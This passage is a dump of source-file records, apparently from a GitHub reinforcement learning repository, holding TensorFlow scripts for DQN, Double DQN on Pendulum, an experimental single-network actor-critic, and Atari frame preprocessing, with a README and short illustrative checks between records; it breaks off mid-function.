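    # Quadratic advantage: zero at u = mu(x), negative elsewhere,
    # hence argmax_u Q(x, u) = mu(x) in closed form.
    diff = u - mu
    return v - 0.5 * diff @ P @ diff
```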
{
"alpha_fraction": 0.6270763874053955,
"alphanum_fraction": 0.6470099687576294,
"avg_line_length": 29.753246307373047,
"blob_id": "e211f1b5830a76a16b87c66a5eb7f9bbb5bc4705",
"content_id": "ed6245f4b26237692a484b21ce16e3e3a702fbaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2642,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 77,
"path": "/Gym_Pendulum_DoubleDQN/run_Pendulum.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDouble DQN & Natural DQN comparison,\nThe Pendulum example.\n\nView more on my tutorial page: https://morvanzhou.github.io/tutorials/\n杆子立起来的时候 reward 为0,其余为负数.\nUsing:\nTensorflow: 1.0\ngym: 0.8.0\n\"\"\"\n\n\nimport gym\nfrom RL_brain import DoubleDQN\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\nenv = gym.make('Pendulum-v0')\nenv = env.unwrapped#不运行这个会有错误\nenv.seed(1)\nMEMORY_SIZE = 3000\nACTION_SPACE = 11 #把这个游戏的连续动作离散化\n\nsess = tf.Session()\nwith tf.variable_scope('Natural_DQN'):#普通的 DQN\n natural_DQN = DoubleDQN(\n n_actions=ACTION_SPACE, n_features=3, memory_size=MEMORY_SIZE,\n e_greedy_increment=0.001, double_q=False, sess=sess\n )\n\nwith tf.variable_scope('Double_DQN'):#double DQN\n double_DQN = DoubleDQN(\n n_actions=ACTION_SPACE, n_features=3, memory_size=MEMORY_SIZE,\n e_greedy_increment=0.001, double_q=True, sess=sess, output_graph=True)\n\nsess.run(tf.global_variables_initializer()) #tf 变量初始化\n\n\ndef train(RL):\n total_steps = 0\n observation = env.reset() #环境初始化\n while True:\n #if total_steps - MEMORY_SIZE > 80: env.render() #启动环境界面\n\n action = RL.choose_action(observation)\n\n f_action = (action-(ACTION_SPACE-1)/2)/((ACTION_SPACE-1)/4) # convert to [-2 ~ 2] float actions 把连续的动作离散化 等距离分割\n observation_, reward, done, info = env.step(np.array([f_action]))\n\n reward /= 10 # normalize to a range of (-1, 0). r = 0 when get upright(normalize 归一化)\n # the Q target at upright state will be 0, because Q_target = r + gamma * Qmax(s', a') = 0 + gamma * 0\n # so when Q at this state is greater than 0, the agent overestimates the Q. Please refer to the final result.\n\n RL.store_transition(observation, action, reward, observation_) #和 DQN 是一样的了.\n\n if total_steps > MEMORY_SIZE: # learning 这是入口 ※\n RL.learn()\n\n if total_steps - MEMORY_SIZE > 20000: # stop game\n break\n\n observation = observation_\n total_steps += 1\n return RL.q #返回 Q 值\n\nq_natural = train(natural_DQN) #从此处运行\nq_double = train(double_DQN)\n\nplt.plot(np.array(q_natural), c='r', label='natural')#所画图为 Q 值图 普通 DQN 图\nplt.plot(np.array(q_double), c='b', label='double')# double DQN 图\nplt.legend(loc='best') #这是设置图例, best 是自动分配位置\nplt.ylabel('Q eval') #纵坐标\nplt.xlabel('training steps')\nplt.grid()\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
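The `f_action` line in `train()` is the only bridge between the 11-way discrete head and Pendulum's continuous torque. A two-line check (illustrative, mirroring the script's constants) makes the mapping explicit:

```python
ACTION_SPACE = 11  # same constant as in run_Pendulum.py

for action in range(ACTION_SPACE):
    # (action - 5) / 2.5: indices 0..10 land on -2.0, -1.6, ..., 1.6, 2.0
    f_action = (action - (ACTION_SPACE - 1) / 2) / ((ACTION_SPACE - 1) / 4)
    print(action, f_action)
```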
{
"alpha_fraction": 0.5176410675048828,
"alphanum_fraction": 0.531265914440155,
"avg_line_length": 35.30534362792969,
"blob_id": "7b1638568e0c9c041753aa430dc5c24b9cb89b6d",
"content_id": "128b5b4cf2a3a6818546166044c4acfcd9b66301",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10575,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 262,
"path": "/Mono_network/mono_network.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n我想用一个网络来实现 AC 的功能, 参考了 NAF 那篇文章的思想,但是目前不 work, 需要进一步探究.\nCreated on Tue Apr 17 01:18:35 2018\n理念:单独网络输出 连续动作 a ,其他分流输出 V 和 A 然后构造 Q, 用 Q 升级网络,周而复始.\n@author: menghaw1 \n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport os #可适应不同系统,解决路径定位的作用\nimport shutil #是一种高层次的文件操作工具\n\nimport sys #为了调用上级目录的下级文件夹\nsys.path.append(\"../..\")\nfrom env.car_env import CarEnv\ntf.reset_default_graph() #为了充值 tf 生成的变量信息,否则不能重复运行\n\nnp.random.seed(1)\ntf.set_random_seed(1)\n\nMAX_EPISODES = 300 # 最大 episode\nMAX_EP_STEPS = 300 # 最大步数设置\nLR_A = 1e-4 # learning rate for actor\nLR_C = 1e-4 # learning rate for critic\nGAMMA = 0.9 # reward discount\nREPLACE_ITER_A = 800\nREPLACE_ITER_C = 700\nMEMORY_CAPACITY = 2000 #记忆容量 原来是2000\nBATCH_SIZE = 16\nVAR_MIN = 0.1\nRENDER = False #开启窗口\n\nLOAD = False #重新训练,不载入之前训练过的\n\nDISCRETE_ACTION = False\n\nenv = CarEnv(discrete_action=DISCRETE_ACTION)\nSTATE_DIM = env.state_dim #5\nACTION_DIM = env.action_dim #1\nACTION_BOUND = env.action_bound\n\n\nsess = tf.Session()\nwriter = tf.summary.FileWriter('logsApril05/',sess.graph)\n\n\n# all placeholder for tf\nwith tf.name_scope('S'):\n S = tf.placeholder(tf.float32, shape=[None, STATE_DIM], name='s')\nwith tf.name_scope('R'):\n R = tf.placeholder(tf.float32, [None, 1], name='r')\nwith tf.name_scope('S_'):\n S_ = tf.placeholder(tf.float32, shape=[None, STATE_DIM], name='s_')\n\n\nclass Actor(object): # Actor 函数网络\n def __init__(self, sess, action_dim, action_bound, learning_rate, t_replace_iter , a ):\n self.sess = sess\n self.a_dim = action_dim\n self.action_bound = action_bound\n self.lr = learning_rate\n self.t_replace_iter = t_replace_iter\n self.t_replace_counter = 0\n self.a = a\n self.gamma = .995\n\n with tf.variable_scope('Actor'):\n # input s, output a\n self.a_,self.q = self._build_net(S, self.a, scope='eval_net', trainable=True)\n\n # input s_, output a, get a_ for critic\n self.a__,self.q_ = self._build_net(S_, self.a_, scope='target_net', trainable=False)\n\n self.e_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval_net') #就是每次 a 的值\n self.t_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target_net')\n \n \n with tf.variable_scope('target_q'):\n self.target_q = R + self.gamma * self.q_\n with tf.variable_scope('TD_error'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.target_q, self.q))\n with tf.variable_scope('C_train'):\n self.train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n\n def _build_net(self, s, a ,scope, trainable): #创建网络\n with tf.variable_scope(scope):\n init_w = tf.contrib.layers.xavier_initializer()\n init_b = tf.constant_initializer(0.001)\n net = tf.layers.dense(s, 100, activation=tf.nn.relu,\n kernel_initializer=init_w, bias_initializer=init_b, name='l1',\n trainable=trainable)\n net = tf.layers.dense(net, 20, activation=tf.nn.relu,\n kernel_initializer=init_w, bias_initializer=init_b, name='l2',\n trainable=trainable)\n with tf.variable_scope('l3_a'):\n actions = tf.layers.dense(net, self.a_dim, activation=tf.nn.tanh, kernel_initializer=init_w,\n name='a', trainable=trainable)\n \n \n scaled_a = tf.multiply(actions, self.action_bound, name='scaled_a') # Scale output to -action_bound to action_bound\n \n # tf.summary.histogram('actions',actions)\n# tf.summary.histogram('scaled_a',scaled_a)\n with tf.variable_scope('l3_V'):\n w3_v = tf.get_variable('w3_v', [20, 1], initializer=init_w) #❓\n b3_v = tf.get_variable('b3_v', [1, 1], initializer=init_b)\n V 
= tf.matmul(net, w3_v) + b3_v\n \n with tf.variable_scope('l3_A'):\n w3_a = tf.get_variable('w3_a', [20, 20], initializer=init_w)\n b3_a = tf.get_variable('b3_a', [1, 20], initializer=init_b)\n A = tf.matmul(net, w3_a) + b3_a\n \n with tf.variable_scope('q'):\n q = V + (A - tf.reduce_mean(A, axis=1, keep_dims=True)) # Q(s,a)#求平均值. reduce 是归约的意思 ,塌缩一个维度. , keep dims 就是保持维度.\n \n return scaled_a,q\n\n def learn(self, s ,a,r,s_): # batch update\n self.sess.run(self.train_op, feed_dict={S: s,self.a:a, R:r, S_:s_})\n if self.t_replace_counter % self.t_replace_iter == 0:\n self.sess.run([tf.assign(t, e) for t, e in zip(self.t_params, self.e_params)])\n print('Actor params changed')\n self.t_replace_counter += 1\n\n def choose_action(self, s, a):# 细看这一段如何选择动作,是否为连续动作\n s = s[np.newaxis, :] # single state\n return self.sess.run(self.a_, feed_dict={S: s, self.a:a})[0] # single action\n\n# def add_grad_to_graph(self, a_grads):\n# \n## tf.summary.histogram('a_grads',a_grads)# 看是不是每次都不一样 运行了,每次都不一样,\n# \n# with tf.variable_scope('policy_grads'):\n# self.policy_grads = tf.gradients(ys=self.a, xs=self.e_params, grad_ys=a_grads)# dy/dx\n#\n# with tf.variable_scope('A_train'):\n# opt = tf.train.RMSPropOptimizer(-self.lr) # (- learning rate) for ascent policy\n# self.train_op = opt.apply_gradients(zip(self.policy_grads, self.e_params)) #每次更改的是后者里面的所有参数.\n\n\n\n\nclass Memory(object): #存储记忆 s,a,r,s_\n def __init__(self, capacity, dims):\n self.capacity = capacity\n self.data = np.zeros((capacity, dims))\n self.pointer = 0\n\n def store_transition(self, s, a, r, s_):\n transition = np.hstack((s, a, [r], s_))\n index = self.pointer % self.capacity # replace the old memory with new memory\n self.data[index, :] = transition\n self.pointer += 1\n\n def sample(self, n): #从记忆中采样 n 个\n assert self.pointer >= self.capacity, 'Memory has not been fulfilled'\n indices = np.random.choice(self.capacity, size=n)\n return self.data[indices, :]\n\n\n\n# Create actor and critic.\nactor = Actor(sess, ACTION_DIM, ACTION_BOUND[1], LR_A, REPLACE_ITER_A, a= [0.2])\n#critic = Critic(sess, STATE_DIM, ACTION_DIM, LR_C, GAMMA, REPLACE_ITER_C, actor.a, actor.a_)\n#actor.add_grad_to_graph(critic.a_grads) # ❓ 这句能保证每次都传入参数么?\n\nM = Memory(MEMORY_CAPACITY, dims=2 * STATE_DIM + ACTION_DIM + 1)\n\nsaver = tf.train.Saver()\npath = './discrete' if DISCRETE_ACTION else './continuous'\n\nif LOAD:\n saver.restore(sess, tf.train.latest_checkpoint(path))\nelse:\n sess.run(tf.global_variables_initializer())\n \n \nmerged = tf.summary.merge_all()\n\n'''----------------从此处开始运行----------------'''\ndef train(): #训练网络的主函数\n var = 2. 
# control exploration 探索性设置 方差为2\n for ep in range(MAX_EPISODES):\n s = env.reset()\n ep_step = 0\n all_step = 0 # 这的 定义有问题,应该放到循环外部 ❓\n \n\n for t in range(MAX_EP_STEPS): #步数\n # while True:\n if RENDER:\n env.render()\n\n # Added exploration noise\n if t == 0 :\n a = [0.2]\n else:\n a = actor.choose_action(s,a) #根据 s 选择 a \n \n a = np.clip(np.random.normal(a, var), *ACTION_BOUND) # add randomness to action selection for exploration #为动作添加探索性\n s_, r, done = env.step(a)\n M.store_transition(s, a, r, s_)\n\n if M.pointer > MEMORY_CAPACITY: #记忆空间\n var = max([var*.9995, VAR_MIN]) # decay the action randomness\n b_M = M.sample(BATCH_SIZE)\n b_s = b_M[:, :STATE_DIM]\n b_a = b_M[:, STATE_DIM: STATE_DIM + ACTION_DIM]\n b_r = b_M[:, -STATE_DIM - 1: -STATE_DIM]\n b_s_ = b_M[:, -STATE_DIM:]\n\n# critic.learn(b_s, b_a, b_r, b_s_) #critic 网络开始学习\n actor.learn(b_s, b_a, b_r, b_s_) #\n \n \n# if all_step % 50 == 0:\n# result = sess.run(merged,feed_dict={S:b_s,R:b_r,S_:b_s_,critic.a:b_a})\n# writer.add_summary(result,all_step)\n \n\n s = s_ #状态更新\n ep_step += 1 #一个 episode中 step 增加一\n all_step += 1\n\n if done or t == MAX_EP_STEPS - 1: #每个 episode 所展示的数据\n # if done:\n \n result1=tf.Summary(value=[tf.Summary.Value(tag='ep_step',simple_value=ep_step)])\n writer.add_summary(result1,ep) \n\n print('Ep:', ep,\n '| Steps: %i' % int(ep_step),\n '| Explore: %.2f' % var,\n )\n break\n #保存 model\n if os.path.isdir(path): shutil.rmtree(path)\n os.mkdir(path) #创建文件夹\n ckpt_path = os.path.join(path, 'DDPG.ckpt')\n save_path = saver.save(sess, ckpt_path, write_meta_graph=False)\n print(\"\\nSave Model %s\\n\" % save_path)\n\n\ndef eval(): #载入曾经的网络\n env.set_fps(30)\n while True:\n s = env.reset()\n while True:\n env.render()\n a = actor.choose_action(s)\n s_, r, done = env.step(a)\n s = s_\n if done:\n break\n\nif __name__ == '__main__':\n if LOAD:\n eval()\n else:\n train()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.8066298365592957,
"alphanum_fraction": 0.8093922734260559,
"avg_line_length": 59,
"blob_id": "a8356fad5ee31f53e125cd627c62e22a6e126489",
"content_id": "44ea87e4dd2e457e194ea238f66c422250eb327e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 6,
"path": "/GSS_DQN/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "> This work formulates the graph signal sampling problem as a Deep Q learning process in discrete action space. We compare the reconstruction results with other two methods, uniform random sampling and random walk sampling. \n\n\nThe result is shown below\n\n\n\n\n"
},
{
"alpha_fraction": 0.5133976340293884,
"alphanum_fraction": 0.5916398763656616,
"avg_line_length": 34.730770111083984,
"blob_id": "2fd542ccc828bafbaf8215222ec28c58cc82bfd0",
"content_id": "ec2438d536bba3370bd802bb3f0b970899d834a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 26,
"path": "/Gym_Enduro/preprocess.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 29 17:41:21 2018\n\n@author: menghaw1\n\"\"\"\nimport numpy as np\nimport tensorflow as tf\n\nclass Preprocess(): # return array this step. not tensor\n def process_state(img): # input shape = (210, 160, 3), dtype: unit8\n grayscale = np.mean(img, axis=2) # shape = (210, 160), calculate mean value along the 2nd dimension\n downsample = grayscale[::2, ::2] # shape = (105, 80), sampling step = 2\n square = downsample[0:80,:] # size (80,80)\n \n state = np.reshape(square,(1,80,80)).astype(np.float32) # shape (1,80,80)\n \n observation = np.stack((state, state, state, state), axis = -1) # shape (1,80,80,4)\n #square = tf.convert_to_tensor(square)\n #square = tf.reshape(square, [-1, 80, 80, 1])\n \n return observation\n \n def process_reward(reward):\n return np.clip(reward, -1., 1.)\n "
},
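Since `process_state` chains four shape changes (grayscale, stride-2 downsample, crop, frame stack), a quick shape check documents the contract. This snippet is illustrative and assumes preprocess.py is importable from the working directory:

```python
import numpy as np
from preprocess import Preprocess

frame = np.zeros((210, 160, 3), dtype=np.uint8)  # raw Atari frame shape
obs = Preprocess.process_state(frame)
print(obs.shape)  # (1, 80, 80, 4): mean over channels, [::2, ::2], crop to 80 rows, stack 4
print(obs.dtype)  # float32
```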
{
"alpha_fraction": 0.7903153896331787,
"alphanum_fraction": 0.7960906028747559,
"avg_line_length": 63.31428527832031,
"blob_id": "eb89dea5170d0dbe2f05231184e679b879e357ec",
"content_id": "0665db7a4f27b8cd22f0bdf9d7c222472264e49a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2251,
"license_type": "no_license",
"max_line_length": 278,
"num_lines": 35,
"path": "/README.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "# Reinforcement Learning\n> This repository includes principal RL algorithms and my RL projects.\n## Gym-series environments \n\n * [Gym_CartPole_v0_DDPG](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Cartpole/DDPG_CartPole_v0.py)\n * [Gym_Enduro](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Enduro/DRL_enduro.py)\n * [Gym_Box2d](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Box2d/carRacing.py)\n * [Gym_MountainCar](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_MountainCar/MountainCar-V0-QL.py)\n * [Gym_Pendulum_DoubleDQN](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Gym_Pendulum_DoubleDQN/run_Pendulum.py)\n\n## Distance evaluation\n\n * [Reading distance from snapshots](https://github.com/MorganWoods/ReinforcementLearning/tree/master/DistancePrediction)\n\n\n## Mono-network (NAF)\n> This is an idea, not work yet. Using only one network output actions with Q values, like NAF paper did.\n * [mono_network](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Mono_network/mono_network.py)\n * [NAF theory](https://github.com/MorganWoods/ReinforcementLearning/blob/master/Mono_network/NAF.md)\n\n\n## Target tracking with RL\n> The idea based on the paper: Action-Decision Networks for Visual Tracking with Deep Reinforcement Learning Electronics and Telecommunications Research Institute ( ETRI ), South Korea; </br> My solution is applying the rl in continuous action area to re design this experiment\n * [target tracking paper](http://openaccess.thecvf.com/content_cvpr_2017/papers/Yun_Action-Decision_Networks_for_CVPR_2017_paper.pdf)\n\n## Graph signal sampling with RL\n> Apply the DQN to do graph sampling walk\n * [Graph signal sampling via DQN](https://github.com/MorganWoods/ReinforcementLearning/tree/master/GSS_DQN)\n\n\n## Searching for optimal solution\n> This task is working on finding right solution of a complex function. Using the advantage of reinforcement learning, agent is used to find out the solution under complicated and tedious environment instead of human.\n\n## Multi-dimensional continuous control via hierarchical reinforcement learning frame\n> Apply hierarchical frame in multi-actions contorlling task.\n"
},
{
"alpha_fraction": 0.551793098449707,
"alphanum_fraction": 0.5645517110824585,
"avg_line_length": 44.18238830566406,
"blob_id": "4c1cdf9be2e78d21ee7713e8140b9f104b9d7ab8",
"content_id": "d363af9412c62255356513e546f4be4ef599583d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15000,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 318,
"path": "/Gym_MountainCar/brain.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 25 21:42:39 2018\nAll 算法的核心部分整合在这个文件中\n@author: menghaw1\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nnp.random.seed(1)\ntf.set_random_seed(1)\n\n# deep Q network off policy\nclass DeepQNetwork:\n def __init__(\n self,\n n_actions,\n n_features,\n learning_rate=0.01,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=300,\n memory_size=500,\n batch_size=32,\n e_greedy_increment=None,\n output_graph=False,\n ):\n self.n_actions=n_actions\n self.n_features=n_features\n self.lr=learning_rate\n self.gamma=reward_decay\n self.epsilon_max=e_greedy\n self.replace_target_iter=replace_target_iter\n self.memory_size=memory_size\n self.batch_size=batch_size\n self.epsilon_increment = e_greedy_increment\n self.epsilon=0 if e_greedy_increment is not None else self.epsilon_max\n \n self.learn_step_counter=0 # total learning step\n # initialize zero memory [s, a, r, s_] 此时状态,下一刻状态 加上 r 和 a\n self.memory = np.zeros((self.memory_size, n_features*2+2)) \n \n self._build_net()\n t_params = tf.get_collection('target_net_params') #Returns a list of values in the collection with the given name\n e_params = tf.get_collection('eval_net_params')\n \n self.replace_target_op = [tf.assign(t,e) for t, e in zip(t_params,e_params)] #不清楚什么意思❓更换目标函数权重参数\n self.sess = tf.Session()\n \n if output_graph:\n tf.summary.FileWriter(\"logs/\",self.sess.graph)\n \n self.sess.run(tf.global_variables_initializer())\n self.cost_his=[]\n #self.reward_his=[]#wu\n def _build_net(self):\n # --------------------------------build evaluate_net--------------------------------------\n self.s = tf.placeholder(tf.float32,[None,self.n_features],name='s') #input\n self.q_target = tf.placeholder(tf.float32,[None,self.n_actions],name='Q_target') #for calculating loss\n with tf.variable_scope('eval_net'):##第一层的神经元数量10\n c_names,n_l1,w_initializer,b_initializer = \\\n ['eval_net_params',tf.GraphKeys.GLOBAL_VARIABLES],\\\n 10,\\\n tf.random_normal_initializer(0.,0.3),\\\n tf.constant_initializer(0.1) #config of layers \n \n #1st layer.\n with tf.variable_scope('l1'):\n w1=tf.get_variable('w1',[self.n_features,n_l1],initializer=w_initializer,collections=c_names)\n b1=tf.get_variable('b1',[1,n_l1],initializer=b_initializer,collections=c_names)\n l1=tf.nn.relu(tf.matmul(self.s,w1)+b1)\n \n #2nd layer.\n with tf.variable_scope('l2'):\n w2=tf.get_variable('w2',[n_l1,self.n_actions],initializer=w_initializer,collections=c_names)\n b2=tf.get_variable('b2',[1,self.n_actions],initializer=b_initializer,collections=c_names)\n self.q_eval=tf.matmul(l1,w2)+b2 #只有一层中间网络,第二层直接是输出层\n \n with tf.variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.q_target,self.q_eval))\n with tf.variable_scope('train'):\n self._train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n \n #--------------------------------build target_net--------------------------------\n self.s_ = tf.placeholder(tf.float32,[None,self.n_features],name='s_')\n \n with tf.variable_scope('target_net'):\n c_names = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n \n with tf.variable_scope('l1'):\n w1=tf.get_variable('w1',[self.n_features,n_l1],initializer=w_initializer,collections=c_names)\n b1=tf.get_variable('b1',[1,n_l1],initializer=b_initializer,collections=c_names)\n l1=tf.nn.relu(tf.matmul(self.s_,w1)+b1)\n with tf.variable_scope('l2'):\n 
w2=tf.get_variable('w2',[n_l1,self.n_actions],initializer=w_initializer,collections=c_names)\n b2=tf.get_variable('b2',[1,self.n_actions],initializer=b_initializer,collections=c_names)\n self.q_next=tf.matmul(l1,w2)+b2 \n \n def store_transition(self,s,a,r,s_):\n if not hasattr(self,'memory_counter'): #判断前者对象的后者属性是否存在,若存在返回 True\n self.memory_counter = 0\n \n transition = np.hstack((s,[a,r],s_)) #horizontal stack 水平合并数组.对应的是 vstack\n #replace the old memory with new memory\n index = self.memory_counter % self.memory_size\n self.memory[index,:] = transition\n self.memory_counter += 1\n \n def choose_action(self,observation):\n observation = observation[np.newaxis,:]\n if np.random.uniform()<self.epsilon:\n actions_value=self.sess.run(self.q_eval,feed_dict={self.s:observation})\n action = np.argmax(actions_value)\n else:\n action = np.random.randint(0,self.n_actions)\n return action\n \n def learn(self):\n #check to repalce target parameters. 每隔多久更换一次目标权重\n if self.learn_step_counter % self.replace_target_iter == 0:\n self.sess.run(self.replace_target_op)\n #ghcs = self.learn_step_counter // self.replace_target_iter #向下取整, wu 加 更换次数; 也可以用 round 函数四舍五入\n #print(ghcs,' times target_params_replaced \\n')\n # sample batch memory from all memory\n if self.memory_counter > self.memory_size:\n sample_index = np.random.choice(self.memory_size,size=self.batch_size)\n else:\n sample_index = np.random.choice(self.memory_counter,size=self.batch_size)\n batch_memory = self.memory[sample_index,:]\n \n q_next,q_eval = self.sess.run([self.q_next,self.q_eval], #❓ 不懂这个一步骤的函数\n feed_dict={ \n self.s_:batch_memory[:,-self.n_features:], #fixed params\n self.s :batch_memory[:,:self.n_features], #newest params\n })\n # change q_target w.r.t q_eval's action\n q_target = q_eval.copy()\n \n batch_index=np.arange(self.batch_size,dtype=np.int32)\n eval_act_index=batch_memory[:,self.n_features].astype(int)\n reward = batch_memory[:,self.n_features+1]\n \n q_target[batch_index,eval_act_index]= reward + self.gamma * np.max(q_next,axis=1) #q_target\n \n # train eval network\n _,self.cost = self.sess.run([self._train_op,self.loss],\n feed_dict={self.s:batch_memory[:,:self.n_features],\n self.q_target: q_target})\n \n self.cost_his.append(self.cost)\n #self.reward_his.append(reward)\n \n #increasing epsilon\n self.epsilon=self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n self.learn_step_counter += 1 \n \n def plot_cost(self): \n fig_cost=plt.figure('fig_cost')\n plt.plot(np.arange(len(self.cost_his)),self.cost_his) \n plt.ylabel('cost')\n plt.xlabel('training steps')\n plt.show(fig_cost) \n''' 有问题 \n def plot_reward(self): \n plt.plot(np.arange(len(self.reward_his)),self.reward_his)\n plt.ylabel('reward')\n plt.xlabel('training steps')\n plt.show\n''' \n\n'''---------------------------------------------------------------------'''\nclass DoubleDQN:\n def __init__(\n self,\n n_actions,\n n_features,\n learning_rate=0.005,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=200,\n memory_size=3000,\n batch_size=32,\n e_greedy_increment=None,\n output_graph=False,\n double_q=True,# double DQN\n sess=None,\n ):\n self.n_actions = n_actions\n self.n_features = n_features\n self.lr = learning_rate\n self.gamma = reward_decay\n self.epsilon_max = e_greedy\n self.replace_target_iter = replace_target_iter\n self.memory_size = memory_size\n self.batch_size = batch_size\n self.epsilon_increment = e_greedy_increment\n self.epsilon = 0 if e_greedy_increment is not None else 
self.epsilon_max\n\n self.double_q = double_q # decide to use double q or not\n\n self.learn_step_counter = 0\n self.memory = np.zeros((self.memory_size, n_features*2+2))\n self._build_net()\n t_params = tf.get_collection('target_net_params')\n e_params = tf.get_collection('eval_net_params')\n self.replace_target_op = [tf.assign(t, e) for t, e in zip(t_params, e_params)]\n\n if sess is None:\n self.sess = tf.Session()\n self.sess.run(tf.global_variables_initializer())\n else:\n self.sess = sess\n if output_graph:\n tf.summary.FileWriter(\"logs/\", self.sess.graph) #输出 board\n self.cost_his = []\n\n def _build_net(self):\n def build_layers(s, c_names, n_l1, w_initializer, b_initializer):\n with tf.variable_scope('l1'):\n w1 = tf.get_variable('w1', [self.n_features, n_l1], initializer=w_initializer, collections=c_names)\n b1 = tf.get_variable('b1', [1, n_l1], initializer=b_initializer, collections=c_names)\n l1 = tf.nn.relu(tf.matmul(s, w1) + b1)\n\n with tf.variable_scope('l2'):\n w2 = tf.get_variable('w2', [n_l1, self.n_actions], initializer=w_initializer, collections=c_names)\n b2 = tf.get_variable('b2', [1, self.n_actions], initializer=b_initializer, collections=c_names)\n out = tf.matmul(l1, w2) + b2\n return out\n # ------------------ build evaluate_net ------------------\n self.s = tf.placeholder(tf.float32, [None, self.n_features], name='s') # input\n self.q_target = tf.placeholder(tf.float32, [None, self.n_actions], name='Q_target') # for calculating loss\n\n with tf.variable_scope('eval_net'):\n c_names, n_l1, w_initializer, b_initializer = \\\n ['eval_net_params', tf.GraphKeys.GLOBAL_VARIABLES], 20, \\\n tf.random_normal_initializer(0., 0.3), tf.constant_initializer(0.1) # config of layers\n\n self.q_eval = build_layers(self.s, c_names, n_l1, w_initializer, b_initializer)\n\n with tf.variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.q_target, self.q_eval))\n with tf.variable_scope('train'):\n self._train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n\n # ------------------ build target_net ------------------\n self.s_ = tf.placeholder(tf.float32, [None, self.n_features], name='s_') # input\n with tf.variable_scope('target_net'):\n c_names = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n\n self.q_next = build_layers(self.s_, c_names, n_l1, w_initializer, b_initializer)\n\n def store_transition(self, s, a, r, s_):\n if not hasattr(self, 'memory_counter'):\n self.memory_counter = 0\n transition = np.hstack((s, [a, r], s_))\n index = self.memory_counter % self.memory_size\n self.memory[index, :] = transition\n self.memory_counter += 1\n\n def choose_action(self, observation): #从此处入口\n observation = observation[np.newaxis, :]\n actions_value = self.sess.run(self.q_eval, feed_dict={self.s: observation})\n action = np.argmax(actions_value)\n\n if not hasattr(self, 'q'): # record action value it gets 记录选择的 Qmax 值\n self.q = []\n self.running_q = 0\n self.running_q = self.running_q*0.99 + 0.01 * np.max(actions_value)\n self.q.append(self.running_q)\n\n if np.random.uniform() > self.epsilon: # choosing action随机\n action = np.random.randint(0, self.n_actions)\n return action\n\n def learn(self):\n #这一段和 DQN 一样\n if self.learn_step_counter % self.replace_target_iter == 0:\n self.sess.run(self.replace_target_op)\n print('\\ntarget_params_replaced\\n')\n\n if self.memory_counter > self.memory_size:\n sample_index = np.random.choice(self.memory_size, size=self.batch_size)\n else:\n sample_index = np.random.choice(self.memory_counter, 
